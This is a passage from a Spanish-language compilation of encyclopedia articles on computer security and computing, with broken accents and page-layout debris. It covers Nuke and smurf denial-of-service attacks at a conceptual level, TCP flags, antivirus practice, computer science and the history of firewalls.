[1] http:/ / anonplus. com/ [2] http:/ / anonops. blogspot. com/ [3] Somos Anonymous, reportaje (http:/ / www. elpais. com/ articulo/ reportajes/ Somos/ Anonymous/ elpepusocdmg/ 20110116elpdmgrep_1/ Tes), 16/1/2011, El Pas [10] answerbag (http:/ / www. answerbag. com/ q_view/ 872606) [11] Serious Business (http:/ / www. citypaper. com/ columns/ story. asp?id=15543) [12] Facebook cierra la cuenta del grupo de ciberactivistas defensores de Wikileaks, El Pas, 9/12/2010 (http:/ / www. elpais. com/ articulo/ internacional/ Facebook/ cierra/ cuenta/ grupo/ ciberactivistas/ defensores/ Wikileaks/ elpepuint/ 20101209elpepuint_11/ Tes#EnlaceComentarios) [13] Operation Black Out April 18, 2011 (http:/ / www. youtube. com/ watch?v=npZ6SeWJR_I& ) (vdeo borrado por infligir los Trminos de Uso de Google) [14] The Inquirer; Youtube is accused of silencing Anonymous (http:/ / www. theinquirer. net/ inquirer/ news/ 2044793/ youtube-accused-silencing-anonymous?WT. rss_f=& WT. rss_a=Youtube+ is+ accused+ of+ silencing+ Anonymous) 17 de abril de 2011. [15] http:/ / derecho-internet. org/ node/ 56 [16] Los detenidos de Anonymous se enfrentan a una pena de uno a tres aos de crcel (http:/ / www. europapress. es/ comunitat-valenciana/ noticia-detenidos-anonymous-enfrentan-pena-tres-anos-carcel-20110610153631. html) [19] http:/ / www. policia. es [20] Anonymous tumba la web de la Polica en respuesta a las detenciones (http:/ / www. rtve. es/ noticias/ 20110612/ anonymous-tumba-web-policia-respuesta-detenciones/ 439337. shtml) [21] (http:/ / www. tabascohoy. com/ noticia. php?id_nota=237170),Operacin Exposure. [22] (http:/ / ecodiario. eleconomista. es/ internacional/ noticias/ 3782785/ 02/ 12/ Redada-contra-Anonymous-25-detenidos-en-Espana-y-Latinoamerica. html), Arrestos contra Anonymous. [23] http:/ / dviglione. blogspot. com. es/ 2012/ 02/ anonymous-la-protesta-enmascarada-le. html

Enlaces externos
Wikimedia Commons alberga contenido multimedia sobre Anonymous. Commons Wikiquote alberga frases clebres de o sobre Anonymous. Wikiquote Wikinoticias tiene noticias relacionadas con Anonymous.Wikinoticias Anonymous Operations (http://www.anonops.net), Sitio web en ingls de AnonOps, sitio que concentra la mayora de las operaciones en curso. Anonymous: los enemigos de los enemigos de Wikileaks (http://blogs.elpais.com/trending-topics/2010/12/ quien-es-anonymous.html), El Pas, 8/12/2010.

Anonymous Somos Anonymous (http://www.elpais.com/articulo/reportajes/Somos/Anonymous/elpepusocdmg/ 20110116elpdmgrep_1/Tes), El Pas, 16/01/2011. Anonymous: de excntricos bromistas a justicieros cibernticos (http://www.m-x.com.mx/xml/pdf/248/40. pdf), Emeequis, 2/20/2011.

27

Nuke
Un Nuke (no confundir con WinNuke), es un viejo ataque de denegacin de servicio contra redes de computadoras.

Qu es un ataque de Nuke?
Dicho ataque consiste en enviar paquetes de datos ICMP fragmentados o de alguna otra forma invlidos a un objetivo, lo que se consigue usando una herramienta de ping modificada para enviar estos datos corruptos una y otra vez, ralentizando la computadora afectada hasta que deje de funcionar. En los juegos en lnea, "nukear" es mandar mensajes uno tras del otro a uno o varios usuarios, en rpida sucesin, que contienen texto al azar. Dichas tcnicas tambin se ven en programas de mensajera instantnea ya que el texto repetido puede ser asignado a una macro o AppleScript. Hoy en da, los sistemas operativos modernos son resistentes a esas tcnicas, y la mayora de los juegos en lnea traen "control de inundacin" (flood control).

Nuke en la escena de warez


Otra definicin de Nuke es la que se usa en la escena del warez. Un programa lanzado como warez es "nukeado" por otros grupos o individuos si, por ejemplo, no se puede instalar, no funciona como se espera o tiene informacin falsa. El grupo que lo lanz puede tambin "nukearlo" si publican otra versin nueva (que s funcione).

Flags

28

Flags
El campo Flags en un protocolo de comunicaciones TCP utiliza 6 bits para activar o desactivar cada una de las siguientes funciones: URG: Especifica a la mquina receptora la existencia de informacin urgente en el flujo de datos. ACK: Se corresponde con una respuesta de correcta recepcin de un paquete anterior que se envi a otra mquina. PSH: Indica a la mquina receptora que debe pasar la informacin a la capa de aplicacin (programas) lo ms rpido posible. Flag RST: Especifica el reinicio de la conexin entre la mquina receptora y la emisora. SYN: Se utiliza para la sincronizacin de nmeros de secuencia entre mquinas. FIN: Indica que debe empezar el proceso de fin de conexin.

Ataque smurf
El ataque smurf es un ataque de denegacin de servicio que utiliza mensajes de ping al broadcast con spoofing para inundar (flood) un objetivo (sistema atacado). En este tipo de ataque, el perpetrador envia grandes cantidades de trfico ICMP (ping) a la direccin de broadcast, todos ellos teniendo la direccin de origen cambiada (spoofing) a la direccin de la vctima. Si el dispositivo de ruteo enva el trfico a esas direcciones de broadcast lo hace en capa 2 donde est la funcin de broadcast, y la mayora de los host tomarn los mensajes ICMP de echo request y lo respondern, multiplicando el trfico por cada host de la subred. En las redes que ofrecen mltiples accessos a broadcast, potencialmente miles de mquinas respondern a cada paquete. Todas esas respuestas vuelven a la IP de origen (la IP de la vctima atacada). Algunos aos atrs, todas las redes enrutaban ataques smurf -- en la jerga se dice que eran "smurfeables" -- Hoy da, la mayora de los administradores han inmunizado sus redes contra estos abusos, aunque muchas redes permanecen smurfeables. Para asegurar una red que disponga de enrutadores Cisco es tan simple como correr el comando no ip directed-broadcast. Smurfs hace referencia a los personajes de ficcin Los Pitufos.

Enlaces externos
Noticia oficial del CERRT sobre ataques DoS de Smurf [1] Lo ltimo en ataques de denegacin de servicio: "Smurfing" Descripcin e informacin para minimizar efectos [2] Definicin de Smurf [3] Ataques Dos en Unix. Recomendaciones generales del Stack IP [4] Definicin de ataques Smurf, Ataques Fraggle, Spoofing, Ataques SYN [5]

Ataque smurf

29

Referencias
[1] [2] [3] [4] [5] http:/ / www. cert. org/ advisories/ CA-1998-01. html http:/ / www. pentics. net/ denial-of-service/ presentations/ 19971027_smurf_files/ frame. htm http:/ / searchsecurity. techtarget. com/ sDefinition/ 0,,sid14_gci213013,00. html http:/ / www. unixcities. com/ dos-attack/ index. html http:/ / www. unixcities. com/ dos-attack/ index1. html

Antivirus
En informtica los antivirus son programas cuyo objetivo es detectar y/o eliminar virus informticos. Nacieron durante la dcada de 1980. Con el transcurso del tiempo, la aparicin de sistemas operativos ms avanzados e Internet, ha hecho que los antivirus hayan evolucionado hacia programas ms avanzados que no slo buscan detectar virus informticos, sino bloquearlos, desinfectarlos y prevenir una infeccin de los mismos, y actualmente ya son capaces de reconocer otros tipos de malware, como spyware, rootkits, etc.

Mtodos de contagio
Existen dos grandes grupos de propagacin: los virus cuya instalacin el usuario en un momento dado ejecuta o acepta de forma inadvertida, o los gusanos, con los que el programa malicioso acta replicndose a travs de las redes. En cualquiera de los dos casos, el sistema operativo infectado comienza a sufrir una serie de comportamientos anmalos o no previstos. Dichos comportamientos son los que dan la traza del problema y tienen que permitir la recuperacin del mismo. Dentro de las contaminaciones ms frecuentes por interaccin del usuario estn las siguientes: Mensajes que ejecutan automticamente programas (como el programa de correo que abre directamente un archivo adjunto). Ingeniera social, mensajes como: Ejecute este programa y gane un premio. Entrada de informacin en discos de otros usuarios infectados. Instalacin de software que pueda contener uno o varios programas maliciosos. Unidades extrables de almacenamiento (USB).

Seguridad y mtodos de proteccin


Los mtodos para contener o reducir los riesgos asociados a los virus pueden ser los denominados activos o pasivos.

Tipos de vacunas
Slo deteccin: Son vacunas que slo actualizan archivos infectados sin embargo no pueden eliminarlos o desinfectarlos. Deteccin y desinfeccin: son vacunas que detectan archivos infectados y que pueden desinfectarlos. Deteccin y aborto de la accin: son vacunas que detectan archivos infectados y detienen las acciones que causa el virus. Comparacin por firmas: son vacunas que comparan las firmas de archivos sospechosos para saber si estn infectados. Comparacin de firmas de archivo: son vacunas que comparan las firmas de los atributos guardados en tu equipo.

Antivirus Por mtodos heursticos: son vacunas que usan mtodos heursticos para comparar archivos. Invocado por el usuario: son vacunas que se activan instantneamente con el usuario. Invocado por la actividad del sistema: son vacunas que se activan instantneamente por la actividad del sistema operativo.

30

Copias de seguridad (pasivo)


Mantener una poltica de copias de seguridad garantiza la recuperacin de los datos y la respuesta cuando nada de lo anterior ha funcionado. Asimismo las empresas deberan disponer de un plan y detalle de todo el software instalado para tener un plan de contingencia en caso de problemas.

Planificacin
La planificacin consiste en tener preparado un plan de contingencia en caso de que una emergencia de virus se produzca, as como disponer al personal de la formacin adecuada para reducir al mximo las acciones que puedan presentar cualquier tipo de riesgo. Cada antivirus puede planear la defensa de una manera, es decir, un antivirus puede hacer un escaneado completo, rpido o de vulnerabilidad segn elija el usuario.

Consideraciones de software
El software es otro de los elementos clave en la parte de planificacin. Se debera tener en cuenta la siguiente lista de comprobaciones para tu seguridad: 1. Tener el software imprescindible para el funcionamiento de la actividad, nunca menos pero tampoco ms. Tener controlado al personal en cuanto a la instalacin de software es una medida que va implcita. Asimismo tener controlado el software asegura la calidad de la procedencia del mismo (no debera permitirse software pirata o sin garantas). En todo caso un inventario de software proporciona un mtodo correcto de asegurar la reinstalacin en caso de desastre. 2. Disponer del software de seguridad adecuado. Cada actividad, forma de trabajo y mtodos de conexin a Internet requieren una medida diferente de aproximacin al problema. En general, las soluciones domsticas, donde nicamente hay un equipo expuesto, no son las mismas que las soluciones empresariales. 3. Mtodos de instalacin rpidos. Para permitir la reinstalacin rpida en caso de contingencia. 4. Asegurar licencias. Determinados softwares imponen mtodos de instalacin de una vez, que dificultan la reinstalacin rpida de la red. Dichos programas no siempre tienen alternativas pero ha de buscarse con el fabricante mtodos rpidos de instalacin. 5. Buscar alternativas ms seguras. Existe software que es famoso por la cantidad de agujeros de seguridad que introduce. Es imprescindible conocer si se puede encontrar una alternativa que proporcione iguales funcionalidades pero permitiendo una seguridad extra.

Antivirus

31

Consideraciones de la red
Disponer de una visin clara del funcionamiento de la red permite poner puntos de verificacin filtrado y deteccin ah donde la incidencia es ms claramente identificable. Sin perder de vista otros puntos de accin es conveniente: 1. Mantener al mximo el nmero de recursos de red en modo de slo lectura. De esta forma se impide que computadoras infectadas los propaguen. 2. Centralizar los datos. De forma que detectores de virus en modo batch puedan trabajar durante la noche. 3. Realizar filtrados de firewall de red. Eliminar los programas que comparten datos, como pueden ser los P2P; Mantener esta poltica de forma rigurosa, y con el consentimiento de la gerencia. 4. Reducir los permisos de los usuarios al mnimo, de modo que slo permitan el trabajo diario. 5. Controlar y monitorizar el acceso a Internet. Para poder detectar en fases de recuperacin cmo se ha introducido el virus, y as determinar los pasos a seguir.

Formacin: Del usuario


Esta es la primera barrera de proteccin de la red.

Antivirus
Es conveniente disponer de una licencia activa de antivirus. Dicha licencia se emplear para la generacin de discos de recuperacin y emergencia. Sin embargo no se recomienda en una red el uso continuo de antivirus. El motivo radica en la cantidad de recursos que dichos programas obtienen del sistema, reduciendo el valor de las inversiones en hardware realizadas. Aunque si los recursos son suficientes, este extra de seguridad puede ser muy til. Sin embargo los filtros de correos con detectores de virus son imprescindibles, ya que de esta forma se asegurar una reduccin importante de elecciones de usuarios no entrenados que pueden poner en riesgo la red. Los virus ms comunes son los troyanos y gusanos, los cuales ocultan tu informacin, creando Accesos Directos.

Firewalls
Filtrar contenidos y puntos de acceso. Eliminar programas que no estn relacionados con la actividad. Tener monitorizado los accesos de los usuarios a la red, permite asimismo reducir la instalacin de software que no es necesario o que puede generar riesgo para la continuidad del negocio. Su significado es barrera de fuego y no permite que otra persona no autorizada tenga acceso desde otro equipo al tuyo.

Reemplazo de software
Los puntos de entrada en la red la mayora de las veces son el correo, las pginas WEB, y la entrada de ficheros desde discos, o de computadoras que no estn en la empresa (porttiles...) Muchas de estas computadoras emplean programas que pueden ser reemplazados por alternativas ms seguras. Es conveniente llevar un seguimiento de cmo distribuyen bancos, y externos el software, valorar su utilidad.

Antivirus

32

Centralizacin y backup
La centralizacin de recursos y garantizar el backup de los datos es otra de las pautas fundamentales en la poltica de seguridad recomendada. La generacin de inventarios de software, centralizacin del mismo y la capacidad de generar instalaciones rpidas proporcionan mtodos adicionales de seguridad. Es importante tener localizado donde tenemos localizada la informacin en la empresa. De esta forma podemos realizar las copias de seguridad de forma adecuada. Control o separacin de la informtica mvil, dado que esta est ms expuesta a las contingencias de virus.

Empleo de sistemas operativos ms seguros


Para servir ficheros no es conveniente disponer de los mismos sistemas operativos que se emplean dentro de las estaciones de trabajo, ya que toda la red en este caso est expuesta a los mismos retos. Una forma de prevenir problemas es disponer de sistemas operativos con arquitecturas diferentes, que permitan garantizar la continuidad de negocio.

Temas acerca de la seguridad


Existen ideas instaladas por parte de las empresas de antivirus parte en la cultura popular que no ayudan a mantener la seguridad de los sistemas de informacin. Mi sistema no es importante para un cracker. Este tema se basa en la idea de que no introducir passwords seguras en una empresa no entraa riesgos pues Quin va a querer obtener informacin ma? Sin embargo dado que los mtodos de contagio se realizan por medio de programas automticos, desde unas mquinas a otras, estos no distinguen buenos de malos, interesantes de no interesantes... Por tanto abrir sistemas y dejarlos sin claves es facilitar la vida a los virus. Estoy protegido pues no abro archivos que no conozco. Esto es falso, pues existen mltiples formas de contagio, adems los programas realizan acciones sin la supervisin del usuario poniendo en riesgo los sistemas. Como tengo antivirus estoy protegido. nicamente estoy protegido mientras el antivirus sepa a lo que se enfrenta y como combatirlo. En general los programas antivirus no son capaces de detectar todas las posibles formas de contagio existentes, ni las nuevas que pudieran aparecer conforme las computadoras aumenten las capacidades de comunicacin. Como dispongo de un firewall no me contagio. Esto nicamente proporciona una limitada capacidad de respuesta. Las formas de infectarse en una red son mltiples. Unas provienen directamente de accesos a mi sistema (de lo que protege un firewall) y otras de conexiones que realiz (de las que no me protege). Emplear usuarios con altos privilegios para realizar conexiones tampoco ayuda. Tengo un servidor web cuyo sistema operativo es un UNIX actualizado a la fecha. Puede que este protegido contra ataques directamente hacia el ncleo, pero si alguna de las aplicaciones web (PHP, Perl, Cpanel, etc.) est desactualizada, un ataque sobre algn script de dicha aplicacin puede permitir que el atacante abra una shell y por ende ejecutar comandos en el UNIX.

Sistemas operativos ms atacados


Las plataformas ms atacadas por virus informticos son la lnea de sistemas operativos Windows de Microsoft. Respecto a los sistemas derivados de Unix como GNU/Linux, BSD, Solaris, Mac OS X, estos han corrido con mayor suerte debido en parte al sistema de permisos. No obstante en las plataformas derivadas de Unix han existido algunos intentos que ms que presentarse como amenazas reales no han logrado el grado de dao que causa un virus en plataformas Windows.

Antivirus

33

Plataformas Unix, inmunes a los virus de Windows


Un virus informtico slo atacar la plataforma para la que fue desarrollado.

Referencias Enlaces externos


Microsoft: Ayuda y soporte tcnico - Lista de proveedores de software antivirus (http://www.microsoft.com/ windows/antivirus-partners/windows-7.aspx) Centro de Respuesta a Incidentes de Seguridad (Informacin actualizada sobre todas las amenazas que circulan por la red) del Gobierno de Espaa - Software antivirus (http://cert.inteco.es/software/Proteccion/ utiles_gratuitos/)

Ciencias de la computacin
Las ciencias de la computacin o ciencias computacionales son aquellas que abarcan las bases tericas de la informacin y la computacin, as como su aplicacin en sistemas computacionales.[1][2][3] Existen diversos campos o disciplinas dentro de las ciencias de la computacin o ciencias computacionales; algunos resaltan los resultados especficos del cmputo (como los grficos por computadora), mientras que otros (como la teora de la complejidad computacional) se relacionan con propiedades de los algoritmos usados al realizar cmputos y otros se enfocan en los problemas que requieren la implementacin de cmputos. Por ejemplo, los estudios de la teora de lenguajes de programacin describen un cmputo, mientras que la programacin de computadoras aplica lenguajes de programacin especficos para desarrollar una solucin a un problema computacional especfico. La informtica se refiere al tratamiento automatizado de la informacin de una forma til y oportuna. No se debe confundir el carcter terico de esta ciencia con otros aspectos prcticos como el uso de Internet. Segn Peter J. Denning, la cuestin fundamental en que se basa la ciencia de la computacin es: "Qu puede ser (eficientemente) automatizado?".[]

Historia
La historia de la ciencia de la computacin antecede a la invencin del computador digital moderno. Antes de la dcada de 1920, el trmino computador se refera a un ser humano que realizaba clculos.[] Los primeros investigadores en lo que despus se convertira las ciencias de la computacin estaban interesados en la cuestin de la computabilidad: qu cosas pueden ser computadas por un ser humano que simplemente siga una lista de instrucciones con lpiz y papel, durante el tiempo que sea necesario, con ingenuidad y sin conocimiento previo del problema. Parte de la motivacin para este trabajo era el desarrollar mquinas que computaran y que pudieran automatizar el tedioso y falible trabajo de la computacin humana. Durante la dcada de 1940, conforme se desarrollaban nuevas y ms poderosas mquinas para computar, el trmino computador se comenz a utilizar para referirse a las mquinas y ya no a sus antecesores humanos. Conforme iba quedando claro que las computadoras podan usarse para ms cosas que solamente clculos matemticos, el campo de la ciencia de la computacin se fue ampliando para estudiar a la computacin (informtica) en general. La ciencia de la computacin comenz entonces a establecerse como una disciplina acadmica en la dcada de 1960, con la creacin de los primeros departamentos de ciencia de la computacin y los primeros programas de licenciatura (Denning 2000).

Ciencias de la computacin

34

Campos de las ciencias de la computacin


Fundamentos matemticos
Criptografa Consta de algoritmos para proteger datos privados, incluido el cifrado. Teora de grafos Recursos elementales para las estructuras de almacenamiento de datos y para los algoritmos de bsqueda. Lgica matemtica La lgica matemtica estudia los sistemas formales en relacin con el modo en el que se codifican nociones intuitivas de objetos matemticos como conjuntos, nmeros, demostraciones y computacin. Teora de tipos Anlisis formal de los tipos de datos y el uso de estos para entender las propiedades de los programas, en particular la seguridad de estos.

Teora de la computacin
Teora de la computacin Teora de autmatas Teora de la computabilidad Teora de la complejidad computacional Lmites fundamentales (en especial de espacio en memoria y tiempo) de los cmputos.

Algoritmos y estructuras de datos


Anlisis de algoritmos Algoritmos procesos formales usados para los cmputos, y eficiencia de estos procesos. Estructuras de datos organizacin y manipulacin de los datos Lgica y computabilidad estudio de diferentes tipos de lgicas, su poder expresivo, decidibilidad, aplicaciones. Especificacin desarrollo de mtodos para definir formalmente (matemtica y lgicamente) el comportamiento esperado de un algoritmo, para luego probar terminacin y correctitud.

Ciencias de la computacin

35

Lenguajes de programacin y compiladores


Compiladores formas de traducir programas computacionales, usualmente a partir de lenguajes de alto nivel a lenguajes de bajo nivel. Teora de lenguajes de programacin lenguajes formales para expresar algoritmos y las propiedades de estos lenguajes.

Bases de datos
Bases de datos Estructura de datos Minera de datos estudio de algoritmos para buscar y procesar informacin en documentos y bases de datos; muy relacionada con la adquisicin de informacin.

Sistemas concurrentes, paralelos y distribuidos


Programacin concurrente teora y prctica de cmputos simultneos y computacin interactiva. Redes de computadoras algoritmos y protocolos para comunicar eficientemente datos a travs de largas distancias, incluye tambin la correccin de errores. Cmputo paralelo computacin con el uso de mltiples computadoras y mltiples procesadores en paralelo. Sistemas distribuidos sistemas que utilizan mltiples procesadores repartidos en una gran rea geogrfica.

Inteligencia artificial
Inteligencia artificial (IA) la implementacin y estudio de sistemas que exhiben (ya sea por su comportamiento o aparentemente) una inteligencia autnoma o comportamiento propio, a veces inspirado por las caractersticas de los seres vivos. Las ciencias de la computacin estn relacionadas con la IA, ya que el software y las computadoras son herramientas bsicas para su desarrollo y progreso. Razonamiento automatizado Robtica algoritmos para controlar el comportamiento de los robots. Visin por computador algoritmos para extraer objetos tridimensionales de una imagen bidimensional. Aprendizaje automtico

Ciencias de la computacin

36

Grficos por computador


Computacin grfica algoritmos tanto para generar sintticamente imgenes visuales como para integrar o alterar la informacin visual y espacial tomada del mundo real. Procesamiento digital de imgenes por ejemplo, para sensores remotos. Geometra computacional por ejemplo, algoritmos veloces para seleccionar solo los puntos visibles en un poliedro visto desde cierto ngulo, usado en motores 3D.

Computacin cientfica
Bioinformtica Computacin cuntica Paradigma de computacin basado en la mecnica cuntica Neurociencia computacional

Relacin con otros campos


Por ser una disciplina reciente, existen varias definiciones alternativas para la ciencia de la computacin. Esta puede ser vista como una forma de ciencia, matemticas o una nueva disciplina que no puede ser categorizada siguiendo los modelos actuales. Las ciencias de la computacin frecuentemente se cruzan con otras reas de investigacin, tales como la fsica y la lingstica. Pero es con las matemticas con las que se considera que tiene un grado mayor de relacin. Eso es evidenciado por el hecho de que los primeros trabajos en el rea fueran fuertemente influenciados por matemticos como Kurt Gdel y Alan Turing. En la actualidad sigue habiendo un intercambio de ideas til entre ambos campos en reas como la lgica matemtica, la teora de categoras, la teora de dominios, el lgebra y la geometra. Otro punto a destacar es que, a pesar de su nombre, las ciencias de la computacin raramente involucran el estudio mismo de las mquinas conocidas como computadoras. De hecho, el renombrado cientfico Edsger Dijkstra es muy citado por la frase "Las ciencias de la computacin estn tan poco relacionadas con las computadoras como la astronoma con los telescopios." Debido a esto, se propuso buscar un nombre definido para esta ciencia emergente, que evitara la relacin con las computadoras. Una primera propuesta fue la de Peter Naur, que acu el trmino datologa, para reflejar el hecho de que la nueva disciplina se ocupaba fundamentalmente del tratamiento de los datos, independientemente de las herramientas de dicho tratamiento, fueran computadoras o artificios matemticos. La primera institucin cientfica en adoptar la denominacin fue el Departamento de Datologa de la Universidad de Copenhague, fundado en 1969, y fue el propio Peter Naur el primer profesor de datologa. Esta denominacin se utiliza principalmente en los pases escandinavos. Asimismo, en los primeros momentos, un gran nmero de trminos aparecieron asociados a los practicantes de la computacin. En esta lista se pueden ver los sugeridos en las revistas y comunicados de la Association for Computer Machinery: turingeniero, turologista, hombre de los diagramas de flujo (flow-charts-man), metamatemtico aplicado y epistemlogo aplicado. Tres meses ms tarde se sugiri el trmino contlogo, seguido de hiplogo al ao siguiente. Tambin se sugiri el trmino comptica para la disciplina. Informtica era, sin embargo, el trmino ms frecuentemente usado en toda Europa.

Ciencias de la computacin El diseo y desarrollo de computadoras y sistemas computacionales generalmente se considera un campo reclamado por disciplinas ajenas a las ciencias de la computacin. Por ejemplo, el estudio del hardware suele considerarse parte de la ingeniera informtica, mientras que el estudio de sistemas computacionales comerciales y su desarrollo suelen denominarse tecnologas de la informacin (TI) o sistemas de informacin. Sin embargo, hay una estrecha comunicacin de ideas entre las distintas disciplinas relacionadas con las computadoras. La ciencia de la computacin a menudo recibe crticas desde otros estamentos que la consideran escasamente rigurosa y cientfica. Esta opinin se plasma en la expresin: "La ciencia es a las ciencias de la computacin como la hidrodinmica a la fontanera", atribuida a Stan Kelly-Bootle y otros afines. La investigacin en ciencias de la computacin tambin suele relacionarse con otras disciplinas, como la ciencia cognitiva, la fsica (vase computacin cuntica), la lingstica, etctera. La relacin entre las ciencias de la computacin y la ingeniera de software es un tema muy discutido, por disputas sobre lo que realmente significa el trmino ingeniera de software y sobre cmo se define a las ciencias de la computacin. Algunas personas creen que la ingeniera de software sera un subconjunto de las ciencias de la computacin. Otras, tomando en cuenta la relacin entre otras disciplinas cientficas y de la ingeniera, creen que el principal objetivo de las ciencias de la computacin sera estudiar las propiedades del cmputo en general, mientras que el objetivo de la ingeniera de software sera disear cmputos especficos para lograr objetivos prcticos, con lo que se convertira en disciplinas diferentes. Este punto de vista es el que sostiene, por ejemplo, Parnas (1998). Incluso hay otros que sostienen que no podra existir una ingeniera de software. Los aspectos acadmicos, polticos y de financiamiento en las reas de ciencias de la computacin tienden a verse influidos drsticamente por el criterio del departamento encargado de la investigacin y la educacin en cada universidad, que puede estar orientado a la matemtica o a la ingeniera. Los departamentos de ciencias de la computacin orientados a la matemtica suelen alinearse del lado de la computacin cientfica y las aplicaciones de clculo numrico. El trmino computacin cientfica, que no debe confundirse con ciencia de la computacin, designa a todas aquellas prcticas destinadas a modelar, plantear experimentos y validar teoras cientficas sirvindose de medios computacionales. En estos casos la computacin es una mera herramienta y el esfuerzo se dirige a avanzar en los campos objetivo (fsica, biologa, mecnica de fluidos, radiotransmisin,...), ms que en la propia ciencia de la computacin. Finalmente, el pblico en general algunas veces confunde la ciencia de la computacin con reas vocacionales que trabajan con computadoras o piensan que trata acerca de su propia experiencia con las computadoras, lo cual suele incluir actividades como los juegos, la navegacin web y el procesamiento de texto. Sin embargo, el punto central de la ciencia de la computacin va ms all de entender las propiedades de los programas que se emplean para implementar aplicaciones de software como juegos y navegadores web, y utiliza ese entendimiento para crear nuevos programas o mejorar los existentes.[4]

37

Ciencias de la computacin

38

Referencias
[1] "Computer science is the study of information" Department of Computer and Information Science (http:/ / www. njit. edu/ v2/ archivecatalog/ undergraduate/ 91/ 19-und. html), Guttenberg Information Technologies [2] "Computer science is the study of computation." Computer Science Department, College of Saint Benedict (http:/ / www. csbsju. edu/ computerscience/ curriculum), Saint John's University [3] "Computer Science is the study of all aspects of computer systems, from the theoretical foundations to the very practical aspects of managing large software projects." Massey University (http:/ / study. massey. ac. nz/ major. asp?major_code=2010& prog_code=93068) [4] "Common myths and preconceptions about Cambridge Computer Science" Computer Science Department (http:/ / www. cl. cam. ac. uk/ admissions/ undergraduate/ myths/ ), University of Cambridge

Bibliografa
Abelson, H. y Sussman, G.J. con Sussman, J. (1996). Structure and Interpretation of Computer Programs, 2nd Ed.. EUA: MIT Press. ISBN 0-262-01153-0. Constable, R. L. (1997). "Nature of the Information Sciences" (http://www.cs.cornell.edu/cis-dean/Nature. pdf). Constable, R. L. (2000, marzo). "Computer Science: Achievements and Challenges circa 2000" (http://www.cs. cornell.edu/cis-dean/bgu.pdf). Parnas, D. L. (1998). Software Engineering Programmes are not Computer Science Programmes.

Enlaces externos
Wikimedia Commons alberga contenido multimedia sobre Ciencias de la computacin. Commons Wikiversidad alberga proyectos de aprendizaje sobre Ciencias de la computacin.Wikiversidad

Cortafuegos (informtica)
Un cortafuegos (firewall en ingls) es una parte de un sistema o una red que est diseada para bloquear el acceso no autorizado, permitiendo al mismo tiempo comunicaciones autorizadas. Se trata de un dispositivo o conjunto de dispositivos configurados para permitir, limitar, cifrar, descifrar, el trfico entre los diferentes mbitos sobre la base de un conjunto de normas y otros criterios.
Esquema de donde se localizara un cortafuegos en una red de ordenadores. Los cortafuegos pueden ser implementados en hardware o software, o una combinacin de ambos. Los cortafuegos se utilizan con frecuencia para evitar que los usuarios de Internet no autorizados tengan acceso a redes privadas conectadas a Internet, especialmente intranets. Todos los mensajes que entren o salgan de la intranet pasan a travs del cortafuegos, que examina cada

Cortafuegos (informtica)

39

mensaje y bloquea aquellos que no cumplen los criterios de seguridad especificados. Tambin es frecuente conectar al cortafuegos a una tercera red, llamada zona desmilitarizada o DMZ, en la que se ubican los servidores de la organizacin que deben permanecer accesibles desde la red exterior. Un cortafuegos correctamente configurado aade una proteccin necesaria a la red, pero que en ningn caso debe considerarse suficiente. La seguridad informtica abarca ms mbitos y ms niveles de trabajo y proteccin.

Historia del cortafuegos


El trmino firewall / fireblock significaba originalmente una pared para confinar un incendio o riesgo potencial de incendio en Un ejemplo de una interfaz de usuario para un cortafuegos en Ubuntu un edificio. Ms adelante se usa para referirse a las estructuras similares, como la hoja de metal que separa el compartimiento del motor de un vehculo o una aeronave de la cabina. La tecnologa de los cortafuegos surgi a finales de 1980, cuando Internet era una tecnologa bastante nueva en cuanto a su uso global y la conectividad. Los predecesores de los cortafuegos para la seguridad de la red fueron los routers utilizados a finales de 1980, que mantenan a las redes separadas unas de otras. La visin de Internet como una comunidad relativamente pequea de usuarios con mquinas compatibles, que valoraba la predisposicin para el intercambio y la colaboracin, termin con una serie de importantes violaciones de seguridad de Internet que se produjo a finales de los 80:[] Clifford Stoll, que descubri la forma de manipular el sistema de espionaje alemn.[] Bill Cheswick, cuando en 1992 instal una crcel simple electrnica para observar a un atacante.[] En 1988, un empleado del Centro de Investigacin Ames de la NASA, en California, envi una nota por correo electrnico a sus colegas[1] que deca: "Estamos bajo el ataque de un virus de Internet! Ha llegado a Berkeley, UC San Diego, Lawrence Livermore, Stanford y la NASA Ames." El Gusano Morris, que se extendi a travs de mltiples vulnerabilidades en las mquinas de la poca. Aunque no era malicioso, el gusano Morris fue el primer ataque a gran escala sobre la seguridad en Internet; la red no esperaba ni estaba preparada para hacer frente a su ataque.[2]

Primera generacin cortafuegos de red: filtrado de paquetes


El primer documento publicado para la tecnologa firewall data de 1988, cuando el equipo de ingenieros Digital Equipment Corporation (DEC) desarroll los sistemas de filtro conocidos como cortafuegos de filtrado de paquetes. Este sistema, bastante bsico, fue la primera generacin de lo que se convertira en una caracterstica ms tcnica y evolucionada de la seguridad de Internet. En AT&T Bell, Bill Cheswick y Steve Bellovin, continuaban sus investigaciones en el filtrado de paquetes y desarrollaron un modelo de trabajo para su propia empresa, con base en su arquitectura original de la primera generacin.[3]

Cortafuegos (informtica) El filtrado de paquetes acta mediante la inspeccin de los paquetes (que representan la unidad bsica de transferencia de datos entre ordenadores en Internet). Si un paquete coincide con el conjunto de reglas del filtro, el paquete se reducir (descarte silencioso) o ser rechazado (desprendindose de l y enviando una respuesta de error al emisor). Este tipo de filtrado de paquetes no presta atencin a si el paquete es parte de una secuencia existente de trfico. En su lugar, se filtra cada paquete basndose nicamente en la informacin contenida en el paquete en s (por lo general utiliza una combinacin del emisor del paquete y la direccin de destino, su protocolo, y, en el trfico TCP y UDP, el nmero de puerto).[4] Los protocolos TCP y UDP comprenden la mayor parte de comunicacin a travs de Internet, utilizando por convencin puertos bien conocidos para determinados tipos de trfico, por lo que un filtro de paquetes puede distinguir entre ambos tipos de trfico (ya sean navegacin web, impresin remota, envo y recepcin de correo electrnico, transferencia de archivos); a menos que las mquinas a cada lado del filtro de paquetes estn a la vez utilizando los mismos puertos no estndar.[5] El filtrado de paquetes llevado a cabo por un cortafuegos acta en las tres primeras capas del modelo de referencia OSI, lo que significa que todo el trabajo lo realiza entre la red y las capas fsicas.[6] Cuando el emisor origina un paquete y es filtrado por el cortafuegos, ste ltimo comprueba las reglas de filtrado de paquetes que lleva configuradas, aceptando o rechazando el paquete en consecuencia. Cuando el paquete pasa a travs de cortafuegos, ste filtra el paquete mediante un protocolo y un nmero de puerto base (GSS). Por ejemplo, si existe una norma en el cortafuegos para bloquear el acceso telnet, bloquear el protocolo IP para el nmero de puerto 23.

40

Segunda generacin cortafuegos de estado


